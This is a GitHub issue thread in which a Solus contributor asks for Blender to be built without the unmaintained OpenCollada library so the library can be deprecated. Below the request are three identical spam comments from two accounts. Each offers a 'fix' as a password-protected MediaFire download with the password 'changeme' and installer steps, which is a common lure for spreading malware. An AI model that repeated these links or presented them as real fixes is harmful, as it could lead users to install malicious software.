### ISSUE TITLE
remove opencollada from blender

### ISSUE THREAD

**Issue by androidnisse** [getsolus/packages#3708]
### Please confirm there isn't already an existing package update request

- [X] I have searched through package update requests

### Name

blender

### Link to the release notes or announcement.

https://devtalk.blender.org/t/moving-collada-i-o-to-legacy-status/34621

### Reason for updating

Opencollada is no longer maintained. The only thing in Solus using this is blender. They have/are removing support for it as well. So if Blender in Solus is built without support for it we can deprecate it and resolve https://github.com/getsolus/packages/issues/2738 I have tried to build it myself but my VM won't manage this build.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
